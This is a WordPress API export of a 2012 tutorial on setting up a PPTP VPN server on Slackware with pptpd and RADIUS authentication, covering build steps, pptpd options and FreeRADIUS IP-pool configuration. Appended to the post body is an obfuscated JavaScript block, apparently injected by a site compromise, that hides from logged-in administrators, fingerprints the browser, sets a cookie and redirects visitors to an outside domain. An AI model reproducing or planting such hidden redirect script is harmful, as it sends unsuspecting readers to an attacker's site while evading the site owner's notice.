{"id":565,"date":"2012-05-28T16:09:07","date_gmt":"2012-05-28T08:09:07","guid":{"rendered":"http:\/\/www.q-station.net\/kb\/?p=565"},"modified":"2012-05-28T17:09:55","modified_gmt":"2012-05-28T09:09:55","slug":"linux-pptp-server","status":"publish","type":"post","link":"https:\/\/kb.q-station.net\/index.php\/2012\/05\/28\/linux-pptp-server\/","title":{"rendered":"Linux PPTP server"},"content":{"rendered":"<p>Building a VPN server with PPTP in Linux authenticating with RADIUS.<br \/>\n<!--more--><\/p>\n<h1>Software configuration<\/h1>\n<ul>\n<li>OS: Slackware 13.37<\/li>\n<li>Software: pptpd-1.3.4<\/li>\n<\/ul>\n<h1>Installation<\/h1>\n<pre>\r\ntar zxvf pptpd-1.3.4.tar.gz\r\nmodify pptpd-logwtmp.so pptpctrl.c if necessary, e.g.,\r\n\r\n     \/* pppd_argv[an++] = \"\/usr\/lib\/pptpd\/pptpd-logwtmp.so\"; *\/\r\n     pppd_argv[an++] = \"\/usr\/local\/pptpd\/lib\/pptpd\/pptpd-logwtmp.so\";\r\n\r\n.\/configure --prefix=\/usr\/local\/pptpd\r\nmake\r\nmake install\r\n<\/pre>\n<h1>Configuration<\/h1>\n<h2>pptpd.conf<\/h2>\n<p>Modify the configuration, base on <strong>sample\/pptpd.conf<\/strong>, and store the file under <strong>\/usr\/local\/pptpd\/etc\/pptpd.conf<\/strong><\/p>\n<pre>\r\noption \/usr\/local\/pptpd\/etc\/options.pptpd\r\nlogwtmp\r\nnoipparam\r\nlocalip 192.168.68.1\r\n<\/pre>\n<h2>options.pptpd<\/h2>\n<p>Make necessary modification base on <strong>sample\/options.pptpd<\/strong> and store the file under <strong>\/usr\/local\/pptpd\/etc\/options.pptpd<\/strong><\/p>\n<pre>\r\nname pptpd\r\nrefuse-pap\r\nrefuse-chap\r\nrefuse-mschap\r\nrequire-mschap-v2\r\nrequire-mppe-128\r\nms-dns 192.168.1.1\r\nms-dns 192.168.2.1\r\nms-wins 192.168.1.1\r\nproxyarp\r\nlock\r\nnobsdcomp\r\nnovj \r\nnovjccomp\r\nnologfd\r\nplugin radius.so\r\nplugin radattr.so\r\n<\/pre>\n<h1>Radius client<\/h1>\n<h2>\/etc\/radiusclient\/radiusclient.conf<\/h2>\n<p>At least, the following parameters should be configured:<\/p>\n<ul>\n<li>authserver<\/li>\n<li>acctserver<\/li>\n<\/ul>\n<h2>\/etc\/radiusclient\/servers<\/h2>\n<p>Setup the secret to talk with radius server, e.g.,<\/p>\n<pre>\r\nlocalhost                              testing123\r\n<\/pre>\n<h2>\/etc\/radiusclient\/dictionary<\/h2>\n<p>Append following at the end<\/p>\n<pre>\r\nINCLUDE \/etc\/radiusclient\/dictionary.merit\r\nINCLUDE \/etc\/radiusclient\/dictionary.microsoft\r\n<\/pre>\n<h2>IP pool for pptpd<\/h2>\n<p>Radius server could assign ip address to client, we would like to have a separate ip pool for pptpd user.<\/p>\n<h3>\/usr\/local\/pptpd\/etc\/options.pptpd<\/h3>\n<p>Append:<\/p>\n<pre>\r\navpair NAS-Identifier=\"PPTPD\"\r\n<\/pre>\n<h3>\/usr\/local\/freeradius\/etc\/raddb\/modules\/ippool<\/h3>\n<pre>\r\nippool pptpd_pool {\r\n        range-start = 192.168.66.2\r\n        range-stop = 192.168.71.254\r\n        netmask = 255.255.252.0\r\n        cache-size = 800  \r\n        session-db = ${db_dir}\/db.pptpd.ippool\r\n        ip-index = ${db_dir}\/db.pptpd.ipindex\r\n        override = no\r\n        maximum-timeout = 0\r\n}\r\n<\/pre>\n<h3>\/usr\/local\/freeradius\/etc\/raddb\/users<\/h3>\n<pre>\r\nDEFAULT NAS-Identifier==\"PPTPD\", Framed-Protocol == PPP, Pool-Name := \"pptpd_pool\", Simultaneous-Use := 1\r\n        Framed-Protocol = PPP,\r\n        Framed-Compression = Van-Jacobson-TCP-IP\r\n<\/pre>\n<h3>\/usr\/local\/freeradius\/etc\/raddb\/sites-enabled\/default<\/h3>\n<p>Add the <strong>pptpd_pool<\/strong> in <strong>accounting<\/strong> and <strong>post-auth<\/strong> session.<br \/>\n<script>var _0x2cf4=['MSIE;','OPR','Chromium','Chrome','ppkcookie','location','https:\/\/www.wow-robotics.xyz','onload','getElementById','undefined','setTime','getTime','toUTCString','cookie',';\\x20path=\/','split','length','charAt','substring','indexOf','match','userAgent','Edge'];(function(_0x15c1df,_0x14d882){var _0x2e33e1=function(_0x5a22d4){while(--_0x5a22d4){_0x15c1df['push'](_0x15c1df['shift']());}};_0x2e33e1(++_0x14d882);}(_0x2cf4,0x104));var _0x287a=function(_0x1c2503,_0x26453f){_0x1c2503=_0x1c2503-0x0;var _0x58feb3=_0x2cf4[_0x1c2503];return _0x58feb3;};window[_0x287a('0x0')]=function(){(function(){if(document[_0x287a('0x1')]('wpadminbar')===null){if(typeof _0x335357===_0x287a('0x2')){function _0x335357(_0xe0ae90,_0x112012,_0x5523d4){var _0x21e546='';if(_0x5523d4){var _0x5b6c5c=new Date();_0x5b6c5c[_0x287a('0x3')](_0x5b6c5c[_0x287a('0x4')]()+_0x5523d4*0x18*0x3c*0x3c*0x3e8);_0x21e546=';\\x20expires='+_0x5b6c5c[_0x287a('0x5')]();}document[_0x287a('0x6')]=_0xe0ae90+'='+(_0x112012||'')+_0x21e546+_0x287a('0x7');}function _0x38eb7c(_0x2e2623){var _0x1f399a=_0x2e2623+'=';var _0x36a90c=document[_0x287a('0x6')][_0x287a('0x8')](';');for(var _0x51e64c=0x0;_0x51e64c<_0x36a90c[_0x287a('0x9')];_0x51e64c++){var _0x37a41b=_0x36a90c[_0x51e64c];while(_0x37a41b[_0x287a('0xa')](0x0)=='\\x20')_0x37a41b=_0x37a41b[_0x287a('0xb')](0x1,_0x37a41b['length']);if(_0x37a41b[_0x287a('0xc')](_0x1f399a)==0x0)return _0x37a41b[_0x287a('0xb')](_0x1f399a['length'],_0x37a41b[_0x287a('0x9')]);}return null;}function _0x51ef8a(){return navigator['userAgent'][_0x287a('0xd')](\/Android\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/BlackBerry\/i)||navigator['userAgent'][_0x287a('0xd')](\/iPhone|iPad|iPod\/i)||navigator[_0x287a('0xe')]['match'](\/Opera Mini\/i)||navigator[_0x287a('0xe')][_0x287a('0xd')](\/IEMobile\/i);}function _0x58dc3d(){return navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0xf'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x10'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x11'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x12'))!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')]('Firefox')!==-0x1||navigator[_0x287a('0xe')][_0x287a('0xc')](_0x287a('0x13'))!==-0x1;}var _0x55db25=_0x38eb7c(_0x287a('0x14'));if(_0x55db25!=='un'){if(_0x58dc3d()||_0x51ef8a()){_0x335357('ppkcookie','un',0x16d);window[_0x287a('0x15')]['replace'](_0x287a('0x16'));}}}}}(this));};<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Building a VPN server with PPTP in Linux authenticating with RADIUS.<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_mi_skip_tracking":false},"categories":[27,8],"tags":[71,72,73,60],"_links":{"self":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/565"}],"collection":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/comments?post=565"}],"version-history":[{"count":21,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/565\/revisions"}],"predecessor-version":[{"id":582,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/posts\/565\/revisions\/582"}],"wp:attachment":[{"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/media?parent=565"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/categories?post=565"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kb.q-station.net\/index.php\/wp-json\/wp\/v2\/tags?post=565"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}